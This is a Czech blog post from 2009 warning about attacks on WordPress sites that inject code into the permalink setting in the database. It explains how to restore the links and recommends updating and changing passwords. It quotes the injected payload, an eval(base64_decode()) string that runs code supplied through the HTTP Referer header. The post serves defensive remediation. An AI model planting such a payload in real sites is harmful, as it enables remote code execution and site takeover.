Spustila se vlna hackerských útoků na WordPress

Zdá se, že hackeři přišli na nový způsob, jak napadnout weby běžící pod WordPressem, a to prostřednictvím zásahu do MySQL databáze. Hack způsobí, že se do URL adresy článků přidá text, který znemožní jejich otevření. Na daný jev se objevilo již několik reakcí a návodů k nápravě.

O původu tohoto jevu se zatím spíše spekuluje, podle autorů článků odkazovaných níže se mezi registrované uživatele přidá nový uživatel, který má administrátorská práva, a poté pronikne do databáze, kam vloží do tabulky wp_options novou podobu trvalých odkazů (permalinks). Jiní ale zase tohoto nového uživatele s administrátorskými právy nenašli…

//EDIT: Podle vyjádření tvůrců WordPressu je verze WordPress 2.8.4 imunní vůči napadení tímto exploitem, proto doporučují aktualizaci starších verzí na tuto nejnovější. Ovšem někde jsem četla, že se přesto dostal i do této verze, snad měl i vytvořit onoho skrytého admina, ale více škod údajně nenapáchal, neupravil trvalé odkazy, ale to už je jen informace bez záruky…

Vyjádření viz blog vývojářů:
http://wordpress.org/development/2009/09/keep-wordpress-secure/

Každopádně je nutné opravit chybné trvalé odkazy. Samozřejmě je také nutno co nejdříve změnit hesla a doporučuje se aktualizovat WordPress na nejnovější verzi 2.8.4, i když se zřejmě jedná o útok, který údajně napadá i weby běžící pod WordPressem 2.8.x. Nejčastěji však šlo o weby běžící pod WordPressem 2.7.x.

Jak se problém projeví? Do URL se připíše kód:

%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/

Kde se opravují URL odkazy?

V databázi MySQL, otevřené například v phpMyAdmin, kde v tabulce wp_options najděte a vyberte řádek option_name, zvolte Projít a cca. na druhé straně výpisu najděte řádek permalink_structure, který zkraťte do původní podoby, tedy odstraňte škodlivý kód (k úpravě se řádek otevře kliknutím na malou tužtičku vlevo), v mém případě tam zbude jen:
/%post_id%/%postname%/.
To ale závisí na nastavení každého.

//EDIT: Možná stačí jít jen do sekce Nastavení – Trvalé odkazy a přehodit vámi upravované odkazy zpět na defaultní, uložit, a pak se zase vrátit k novým upraveným URL a zase uložit… V databázi by se to tak mělo (snad) přepsat i bez zásahu do ní. Zatím se pokouším najít informaci, jak je to s oním nově vzniklým uživatelem, který si zadal administrátorská práva, zdá se, že jednou se vytvoří, podruhé ne… //

Zdroje a více informací například na stránkách:

http://bo.uzasne.cz/novinky/wordpress-byl-hacknut-zkontrolujte-sve-blogy.html

http://www.journeyetc.com/2009/09/04/wordpress-permalink-rss-problems/

http://blog.martinsimko.cz/2009/09/04/nemate-take-hackly-wordpress-blog/



Přečtěte si také:



Kategorie : Užitečné, WordPress
Štítky: , ,

Okomentovat

Pro vkládání komentářů musíte být přihlášen/a.